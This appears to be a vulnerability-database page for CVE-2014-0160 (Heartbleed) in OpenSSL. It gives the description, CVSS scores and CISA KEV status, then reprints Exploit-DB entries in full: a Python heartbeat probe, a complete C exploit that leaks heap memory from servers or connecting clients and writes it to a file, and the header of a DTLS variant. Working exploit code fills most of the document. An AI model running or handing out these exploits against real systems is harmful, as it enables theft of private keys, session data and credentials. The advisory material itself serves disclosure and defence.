CVE-2014-0160
Alert for a CVE
Stay informed of any changes for a specific CVE.
Descriptions
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Out-of-bounds Read The product reads data past the end, or before the beginning, of the intended buffer. |
Metrics
| Metric | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V3.1 | 7.5 | HIGH |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
More informations
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack VectorThis metric reflects the context by which vulnerability exploitation is possible. Network The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). Attack ComplexityThis metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges RequiredThis metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User InteractionThis metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. ScopeFormally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. Unchanged An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality ImpactThis metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. High There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity ImpactThis metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. None There is no loss of integrity within the impacted component. Availability ImpactThis metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. None There is no impact to availability within the impacted component. Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability. |
nvd@nist.gov |
| V2 | 5 | AV:N/AC:L/Au:N/C:P/I:N/A:N | nvd@nist.gov |
CISA KEV (Known Exploited Vulnerabilities)
Vulnerability name : OpenSSL Information Disclosure Vulnerability
Required action : Apply updates per vendor instructions.
Known To Be Used in Ransomware Campaigns : Unknown
Added : 2022-05-03 22:00 +00:00
Action is due : 2022-05-24 22:00 +00:00
Important informations
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 32764
Publication date : 2014-04-08 22:00 +00:00
Author : Fitzl Csaba
EDB Verified : Yes
# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]
# Date: [2014-04-09]
# Exploit Author: [Csaba Fitzl]
# Vendor Homepage: [http://www.openssl.org/]
# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]
# Version: [1.0.1f]
# Tested on: [N/A]
# CVE : [2014-0160]
#!/usr/bin/env python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by Csaba Fitzl for multiple SSL / TLS version support
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
version = []
version.append(['SSL 3.0','03 00'])
version.append(['TLS 1.0','03 01'])
version.append(['TLS 1.1','03 02'])
version.append(['TLS 1.2','03 03'])
def create_hello(version):
hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
return hello
def create_hb(version):
hb = h2bin('18 ' + version + ' 00 03 01 40 00')
return hb
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s,hb):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
for i in range(len(version)):
print 'Trying ' + version[i][0] + '...'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(create_hello(version[i][1]))
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(create_hb(version[i][1]))
if hit_hb(s,create_hb(version[i][1])):
#Stop if vulnerable
break
if __name__ == '__main__':
main()
Exploit Database EDB-ID : 32791
Publication date : 2014-04-09 22:00 +00:00
Author : prdelka
EDB Verified : Yes
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned within encrypted SSL packets and is then decrypted
* and wrote to a file to annoy IDS/forensics. The exploit can
* set heartbeat payload length arbitrarily or use two preset
* values for NULL and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
* is user supplied and returned to the user as part of DTLS/TLS
* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
* 1.0.1f are known affected. You must run this against a target
* which is linked to a vulnerable OpenSSL library using DTLS/TLS.
* This exploit leaks upto 65535 bytes of remote heap each request
* and can be run in a loop until the connected peer ends connection.
* The data leaked contains 16 bytes of random padding at the end.
* The exploit can be used against a connecting client or server,
* it can also send pre_cmd's to plain-text services to establish
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
* will often forcefully close the connection during large leak
* requests so try to lower your payload request size.
*
* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
*
* E.g.
* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ connecting to 192.168.11.23 443/tcp
* [ connected to 192.168.11.23 443/tcp
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ heartbleed leaked length=65535
* [ final record type=24, length=16384
* [ wrote 16381 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=42
* [ decrypting SSL packet
* [ final record type=24, length=18
* [ wrote 18 bytes of heap to file 'out'
* [ done.
* $ ls -al out
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
* $ hexdump -C out
* - snip - snip
*
* Use following example command to generate certificates for clients.
*
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
* -keyout server.key -out server.crt
*
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
*
* todo: add udp/dtls support.
*
* - Hacker Fantastic
* http://www.mdsec.co.uk
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
(((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
int first = 0;
int leakbytes = 0;
int repeat = 1;
int badpackets = 0;
typedef struct {
int socket;
SSL *sslHandle;
SSL_CTX *sslContext;
} connection;
typedef struct {
unsigned char type;
short version;
unsigned int length;
unsigned char hbtype;
unsigned int payload_length;
void* payload;
} heartbeat;
void ssl_init();
void usage();
int tcp_connect(char*,int);
int tcp_bind(char*, int);
connection* tls_connect(int);
connection* tls_bind(int);
int pre_cmd(int,int,int);
void* heartbleed(connection* ,unsigned int);
void* sneakyleaky(connection* ,char*, int);
int tcp_connect(char* server,int port){
int sd,ret;
struct hostent *host;
struct sockaddr_in sa;
host = gethostbyname(server);
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd==-1){
printf("[!] cannot create socket\n");
exit(0);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = *((struct in_addr *) host->h_addr);
bzero(&(sa.sin_zero),8);
printf("[ connecting to %s %d/tcp\n",server,port);
ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));
if(ret==0){
printf("[ connected to %s %d/tcp\n",server,port);
}
else{
printf("[!] FATAL: could not connect to %s %d/tcp\n",server,port);
exit(0);
}
return sd;
}
int tcp_bind(char* server, int port){
int sd, ret, val=1;
struct sockaddr_in sin;
struct hostent *host;
host = gethostbyname(server);
sd=socket(AF_INET,SOCK_STREAM,0);
if(sd==-1){
printf("[!] cannot create socket\n");
exit(0);
}
memset(&sin,0,sizeof(sin));
sin.sin_addr=*((struct in_addr *) host->h_addr);
sin.sin_family=AF_INET;
sin.sin_port=htons(port);
setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));
ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));
if(ret==-1){
printf("[!] cannot bind socket\n");
exit(0);
}
listen(sd,5);
return(sd);
}
void ssl_init(){
SSL_load_error_strings();
SSL_library_init();
OpenSSL_add_all_digests();
OpenSSL_add_all_algorithms();
OpenSSL_add_all_ciphers();
}
connection* tls_connect(int sd){
connection *c;
c = malloc(sizeof(connection));
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
c->sslHandle = SSL_new(c->sslContext);
if(c->sslHandle==NULL)
ERR_print_errors_fp(stderr);
if(!SSL_set_fd(c->sslHandle,c->socket))
ERR_print_errors_fp(stderr);
if(SSL_connect(c->sslHandle)!=1)
ERR_print_errors_fp(stderr);
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
}
return c;
}
connection* tls_bind(int sd){
int bytes;
connection *c;
char* buf;
buf = malloc(4096);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buf,0,4096);
c = malloc(sizeof(connection));
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(SSLv23_server_method());
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
SSL_CTX_SRP_CTX_init(c->sslContext);
SSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);
SSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM);
if(!SSL_CTX_check_private_key(c->sslContext)){
printf("[!] FATAL: private key does not match the certificate public key\n");
exit(0);
}
c->sslHandle = SSL_new(c->sslContext);
if(c->sslHandle==NULL)
ERR_print_errors_fp(stderr);
if(!SSL_set_fd(c->sslHandle,c->socket))
ERR_print_errors_fp(stderr);
int rc = SSL_accept(c->sslHandle);
printf ("[ SSL connection using %s\n", SSL_get_cipher (c->sslHandle));
bytes = SSL_read(c->sslHandle, buf, 4095);
printf("[ recieved: %d bytes - showing output\n%s\n[\n",bytes,buf);
if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){
printf("[ warning: heartbeat extension is unsupported (try anyway)\n");
}
return c;
}
int pre_cmd(int sd,int precmd,int verbose){
/* this function can be used to send commands to a plain-text
service or client before heartbleed exploit attempt. e.g. STARTTLS */
int rc, go = 0;
char* buffer;
char* line1;
char* line2;
switch(precmd){
case 0:
line1 = "EHLO test\n";
line2 = "STARTTLS\n";
break;
case 1:
line1 = "CAPA\n";
line2 = "STLS\n";
break;
case 2:
line1 = "a001 CAPB\n";
line2 = "a002 STARTTLS\n";
break;
default:
go = 1;
break;
}
if(go==0){
buffer = malloc(2049);
if(buffer==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
printf("[ banner: %s",buffer);
send(sd,line1,strlen(line1),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
send(sd,line2,strlen(line2),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
}
return sd;
}
void* heartbleed(connection *c,unsigned int type){
unsigned char *buf, *p;
int ret;
buf = OPENSSL_malloc(1 + 2);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
p = buf;
*p++ = TLS1_HB_REQUEST;
switch(type){
case 0:
s2n(0x0,p);
break;
case 1:
s2n(0xffff,p);
break;
default:
printf("[ setting heartbeat payload_length to %u\n",type);
s2n(type,p);
break;
}
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
OPENSSL_free(buf);
return c;
}
void* sneakyleaky(connection *c,char* filename, int verbose){
char *p;
int ssl_major,ssl_minor,al;
int enc_err,n,i;
SSL3_RECORD *rr;
SSL_SESSION *sess;
SSL* s;
unsigned char md[EVP_MAX_MD_SIZE];
short version;
unsigned mac_size, orig_len;
size_t extra;
rr= &(c->sslHandle->s3->rrec);
sess=c->sslHandle->session;
s = c->sslHandle;
if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)
extra=SSL3_RT_MAX_EXTRA;
else
extra=0;
if ((s->rstate != SSL_ST_READ_BODY) ||
(s->packet_length < SSL3_RT_HEADER_LENGTH)) {
n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);
if (n <= 0)
goto apple;
s->rstate=SSL_ST_READ_BODY;
p=s->packet;
rr->type= *(p++);
ssl_major= *(p++);
ssl_minor= *(p++);
version=(ssl_major<<8)|ssl_minor;
n2s(p,rr->length);
if(rr->type==24){
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
if(rr->length > 16834){
printf("[ error: got a malformed TLS length.\n");
exit(0);
}
}
else{
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
goto apple;
}
}
if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){
i=rr->length;
n=ssl3_read_n(s,i,i,1);
if (n <= 0) goto apple;
}
printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
rr->data=rr->input;
tls1_enc(s,0);
if((sess != NULL) &&
(s->enc_read_ctx != NULL) &&
(EVP_MD_CTX_md(s->read_hash) != NULL))
{
unsigned char *mac = NULL;
unsigned char mac_tmp[EVP_MAX_MD_SIZE];
mac_size=EVP_MD_CTX_size(s->read_hash);
OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);
orig_len = rr->length+((unsigned int)rr->type>>8);
if(orig_len < mac_size ||
(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
orig_len < mac_size+1)){
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);
}
if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){
mac = mac_tmp;
ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);
rr->length -= mac_size;
}
else{
rr->length -= mac_size;
mac = &rr->data[rr->length];
}
i = tls1_mac(s,md,0);
if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)
enc_err = -1;
if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)
enc_err = -1;
}
if(enc_err < 0){
al=SSL_AD_BAD_RECORD_MAC;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);
goto apple;
}
if(s->expand != NULL){
if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {
al=SSL_AD_RECORD_OVERFLOW;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);
goto apple;
}
if (!ssl3_do_uncompress(s)) {
al=SSL_AD_DECOMPRESSION_FAILURE;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);
goto apple;
}
}
if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {
al=SSL_AD_RECORD_OVERFLOW;
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);
goto apple;
}
rr->off=0;
s->packet_length=0;
if(first==0){
uint heartbleed_len = 0;
char* fp = s->s3->rrec.data;
(long)fp++;
memcpy(&heartbleed_len,fp,2);
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
first = 2;
leakbytes = heartbleed_len + 16;
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
}
if(verbose==1){
{ unsigned int z; for (z=0; zlength; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
leakbytes-=rr->length;
if(leakbytes > 0){
repeat = 1;
}
else{
repeat = 0;
}
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
int output = s->s3->rrec.length-3;
if(output > 0){
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
if(first==2){
first--;
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
/* first three bytes are resp+len */
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
}
else{
/* heap data & 16 bytes padding */
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
}
close(fd);
}
else{
printf("[ nothing from the heap to write\n");
}
return;
apple:
printf("[ problem handling SSL record packet - wrong type?\n");
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
return;
}
void usage(){
printf("[\n");
printf("[ --server|-s - the server to target\n");
printf("[ --port|-p - the port to target\n");
printf("[ --file|-f - file to write data to\n");
printf("[ --bind|-b - bind to ip for exploiting clients\n");
printf("[ --precmd|-c - send precmd buffer (STARTTLS)\n");
printf("[ 0 = SMTP\n");
printf("[ 1 = POP3\n");
printf("[ 2 = IMAP\n");
printf("[ --loop|-l - loop the exploit attempts\n");
printf("[ --type|-t - select exploit to try\n");
printf("[ 0 = null length\n");
printf("[ 1 = max leak\n");
printf("[ n = heartbeat payload_length\n");
printf("[\n");
printf("[ --verbose|-v - output leak to screen\n");
printf("[ --help|-h - this output\n");
printf("[\n");
exit(0);
}
int main(int argc, char* argv[]){
int ret, port, userc, index;
int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;
int loop = 0;
struct hostent *h;
connection* c;
char *host, *file;
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
printf("[ =============================================================\n");
static struct option options[] = {
{"server", 1, 0, 's'},
{"port", 1, 0, 'p'},
{"file", 1, 0, 'f'},
{"type", 1, 0, 't'},
{"bind", 1, 0, 'b'},
{"verbose", 0, 0, 'v'},
{"precmd", 1, 0, 'c'},
{"loop", 0, 0, 'l'},
{"help", 0, 0,'h'}
};
while(userc != -1) {
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);
switch(userc) {
case -1:
break;
case 's':
if(ihost==0){
ihost = 1;
h = gethostbyname(optarg);
if(h==NULL){
printf("[!] FATAL: unknown host '%s'\n",optarg);
exit(1);
}
host = malloc(strlen(optarg) + 1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
}
break;
case 'p':
if(iport==0){
port = atoi(optarg);
iport = 1;
}
break;
case 'f':
if(ifile==0){
file = malloc(strlen(optarg) + 1);
if(file==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(file,"%s",optarg);
ifile = 1;
}
break;
case 't':
if(itype==0){
type = atoi(optarg);
itype = 1;
}
break;
case 'h':
usage();
break;
case 'b':
if(ihost==0){
ihost = 1;
host = malloc(strlen(optarg)+1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
bind = 1;
}
break;
case 'c':
if(iprecmd == 0){
iprecmd = 1;
precmd = atoi(optarg);
}
break;
case 'v':
verbose = 1;
break;
case 'l':
loop = 1;
break;
default:
break;
}
}
if(ihost==0||iport==0||ifile==0||itype==0||type < 0){
printf("[ try --help\n");
exit(0);
}
ssl_init();
if(bind==0){
ret = tcp_connect(host, port);
pre_cmd(ret, precmd, verbose);
c = tls_connect(ret);
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=1;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
else{
int sd, pid, i;
ret = tcp_bind(host, port);
while(1){
sd=accept(ret,0,0);
if(sd==-1){
printf("[!] FATAL: problem with accept()\n");
exit(0);
}
if(pid=fork()){
close(sd);
}
else{
c = tls_bind(sd);
pre_cmd(ret, precmd, verbose);
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=0;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
}
}
}
Exploit Database EDB-ID : 32998
Publication date : 2014-04-23 22:00 +00:00
Author : Ayman Sagy
EDB Verified : Yes
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned within encrypted SSL packets and is then decrypted
* and wrote to a file to annoy IDS/forensics. The exploit can
* set heartbeat payload length arbitrarily or use two preset
* values for NULL and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
* is user supplied and returned to the user as part of DTLS/TLS
* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
* 1.0.1f are known affected. You must run this against a target
* which is linked to a vulnerable OpenSSL library using DTLS/TLS.
* This exploit leaks upto 65532 bytes of remote heap each request
* and can be run in a loop until the connected peer ends connection.
* The data leaked contains 16 bytes of random padding at the end.
* The exploit can be used against a connecting client or server,
* it can also send pre_cmd's to plain-text services to establish
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
* will often forcefully close the connection during large leak
* requests so try to lower your payload request size.
*
* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
*
* E.g.
* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ connecting to 192.168.11.23 443/tcp
* [ connected to 192.168.11.23 443/tcp
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ heartbleed leaked length=65535
* [ final record type=24, length=16384
* [ wrote 16381 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=42
* [ decrypting SSL packet
* [ final record type=24, length=18
* [ wrote 18 bytes of heap to file 'out'
* [ done.
* $ ls -al out
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
* $ hexdump -C out
* - snip - snip
*
* Use following example command to generate certificates for clients.
*
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
* -keyout server.key -out server.crt
*
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
*
* todo: add udp/dtls support.
*
* - Hacker Fantastic
* http://www.mdsec.co.uk
*
*/
/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support
*
